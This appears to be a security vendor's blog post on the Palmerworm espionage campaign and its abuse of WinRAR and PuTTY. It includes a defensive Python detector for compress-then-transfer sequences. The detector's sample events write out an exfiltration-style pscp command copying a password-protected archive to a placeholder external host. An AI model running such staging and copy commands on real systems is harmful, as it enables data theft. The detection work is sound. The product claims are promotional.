Preventing Palmerworm Espionage
December 4, 2020
An espionage group known as Palmerworm used new malware to attack targets worldwide, including companies in media, finance, construction, and engineering in the US, Japan, Taiwan, and China.
In some cases, Palmerworm maintained a presence on compromised networks for more than a year using 'living-off-the-land' tactics: abusing legitimate software that is already present on the victim's systems so that its activity does not raise suspicion. The group also signs its malware payloads with stolen code-signing certificates so that the binaries appear legitimate.
Researchers cannot see what Palmerworm exfiltrates from its victims, but the group is assessed to be an espionage actor and is most likely motivated by stealing information from the targeted companies.
The Palmerworm attack resembles extortion-style ransomware, in which thieves steal your data and demand a ransom in exchange for not releasing it to the public. The difference here is that the attackers already see value in your data and know how to monetize it without asking for a ransom. An attack of this nature could continue indefinitely if it is not caught.
SecureCircle will not prevent the attackers from installing malware or exfiltrating files from the company. Endpoint Detection and Response (EDR) solutions exist to detect and stop suspicious activity of that kind; one of the known victims, with proper security in place, detected the attack within two days.
SecureCircle secures the data itself, so your confidential internal data remains inaccessible to the attackers, and to the public, even if the files are released. Data is persistently protected at rest, in transit, and in use. Even when files leave the company, unauthorized users cannot read the encrypted contents.
In the Palmerworm case, the attackers used ordinary applications for reconnaissance, compression, and remote transfer: WinRAR to compress the data so that it was easier to move, and PuTTY to open remote connections and transfer it. With SecureCircle, such applications are not allowed to read the encrypted contents of files by default, because their job is to move data, not to view it. Similar applications that mainly move data, such as email clients and web browsers, also have no permission to read secured data. Applications that have not been enabled to view encrypted data can only move it in its encrypted form, while applications such as Excel can be granted permission to read it. SecureCircle's permissions are granular beyond devices and users: access to secured data can also be authorized by application and by network.
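Because WinRAR and PuTTY are ordinary software, the signal an EDR or SIEM can act on is the sequence of events rather than any single process. The following Python is an added example written for this page, not SecureCircle's or the original researchers' code: it flags "archive created, then a transfer tool launched shortly afterwards by the same user on the same host" over a handful of constructed process-creation records. The field names (ts, host, user, image, cmdline), the tool lists and the 30-minute window are assumptions for the example, not findings from the page.

```python
"""Detect 'compress then transfer' data-staging sequences in process telemetry.

Added example, not SecureCircle's or the original researchers' code. The records
below are constructed to resemble process-creation events (for instance Sysmon
Event ID 1 or an EDR feed); the field names ts/host/user/image/cmdline are
assumptions made for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tools the write-up names (WinRAR, PuTTY) plus their common siblings, as
# lower-cased executable names. Assumption: extend to match your environment.
ARCHIVERS = {"winrar.exe", "rar.exe", "7z.exe"}
TRANSFER_TOOLS = {"putty.exe", "pscp.exe", "psftp.exe", "plink.exe"}
# How long after an archive is created a transfer still counts as the same
# staging step. Assumption: 30 minutes is a starting point, not a tuned value.
STAGING_WINDOW_MINUTES = 30
# WinRAR/RAR switches -p<pwd> and -hp<pwd> encrypt the archive, a common
# exfiltration tell because it hides the contents from inspection.
PASSWORD_SWITCH = re.compile(r"(?:^|\s)-(?:hp|p)\S*")
# user@host: prefix used by pscp/psftp for the remote side of a copy.
REMOTE_TARGET = re.compile(r"(\S+@[\w.\-]+):")

# Constructed sample events (not real telemetry). 203.0.113.10 is a
# documentation address.
SAMPLE_EVENTS = [
    {"ts": "2020-11-02T01:12:04", "host": "WS-042", "user": "CORP\\jsmith",
     "image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "cmdline": "WinRAR.exe a -r -hp C:\\Users\\Public\\update.rar D:\\Projects\\cad\\"},
    {"ts": "2020-11-02T01:19:40", "host": "WS-042", "user": "CORP\\jsmith",
     "image": "C:\\Users\\Public\\pscp.exe",
     "cmdline": "pscp.exe -P 443 C:\\Users\\Public\\update.rar admin@203.0.113.10:/tmp/"},
    # Benign: an admin archives a report in the morning and opens an SSH
    # session hours later. Same tools, but outside the window, so no alert.
    {"ts": "2020-11-02T09:00:00", "host": "WS-007", "user": "CORP\\alee",
     "image": "C:\\Program Files\\WinRAR\\WinRAR.exe",
     "cmdline": "WinRAR.exe a C:\\Users\\alee\\report.rar C:\\Users\\alee\\report.docx"},
    {"ts": "2020-11-02T14:30:00", "host": "WS-007", "user": "CORP\\alee",
     "image": "C:\\Program Files\\PuTTY\\putty.exe",
     "cmdline": "putty.exe -load bastion"},
    # Benign: a transfer tool with no preceding archive on that host/user.
    {"ts": "2020-11-02T10:05:00", "host": "WS-011", "user": "CORP\\bwong",
     "image": "C:\\Program Files\\PuTTY\\plink.exe",
     "cmdline": "plink.exe -batch build@203.0.113.20 uptime"},
]


def basename(image_path: str) -> str:
    """Return the lower-cased executable name from a Windows image path."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_staging_sequences(events, window_minutes=STAGING_WINDOW_MINUTES):
    """Return one alert per transfer-tool launch that follows an archiver run
    by the same user on the same host within window_minutes.

    The most recent archiver run inside the window is the one paired with
    the transfer; each alert is a dict describing both events.
    """
    window = timedelta(minutes=window_minutes)
    per_actor = defaultdict(list)
    for ev in events:
        per_actor[(ev["host"], ev["user"])].append(ev)

    alerts = []
    for (host, user), evs in per_actor.items():
        recent_archives = []  # (timestamp, event) for archiver runs still in the window
        for ev in sorted(evs, key=lambda e: e["ts"]):
            ts = datetime.fromisoformat(ev["ts"])
            name = basename(ev["image"])
            # Forget archiver runs that are now too old to pair with this event.
            recent_archives = [(t, a) for t, a in recent_archives if ts - t <= window]
            if name in ARCHIVERS:
                recent_archives.append((ts, ev))
            elif name in TRANSFER_TOOLS and recent_archives:
                archive_ts, archive_ev = recent_archives[-1]
                target = REMOTE_TARGET.search(ev["cmdline"])
                alerts.append({
                    "host": host,
                    "user": user,
                    "archiver": basename(archive_ev["image"]),
                    "archive_cmdline": archive_ev["cmdline"],
                    "transfer_tool": name,
                    "transfer_cmdline": ev["cmdline"],
                    "destination": target.group(1) if target else None,
                    "password_protected": bool(PASSWORD_SWITCH.search(archive_ev["cmdline"])),
                    "gap_minutes": round((ts - archive_ts).total_seconds() / 60, 1),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_staging_sequences(SAMPLE_EVENTS):
        print(alert)
```

Run against the constructed events, only the WS-042 pair fires: a password-protected archive followed eight minutes later by a pscp copy to an external host. The later WinRAR and PuTTY use on WS-007 stays silent because it falls outside the window, and a lone plink run never pairs with anything. In production the window and tool lists need tuning, and the alert should carry the parent process and network destination so an analyst can pivot quickly.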
Another significant benefit of SecureCircle is rapid deployment. SecureCircle is transparent to end-users and does not change user or business workflows, unlike many other security solutions. Without impacting users, companies can secure all of their data by default rather than selecting only the most crucial data. Because there is no need to discover or classify data first, companies implement SecureCircle quickly by defining data sources such as SaaS applications, file servers, or specific applications on user devices such as CAD, Adobe, or source-code tools.
SecureCircle helps eliminate data breaches caused by malicious external attackers such as Palmerworm as well as by malicious and accidental insiders.
Prevent Data Breaches
Let’s discuss your unique cybersecurity challenges and needs.
If you want to be notified when we post the newest content about mitigating insider threats, data breaches, protecting source code, and DASB, please subscribe to our SecureCircle newsletter.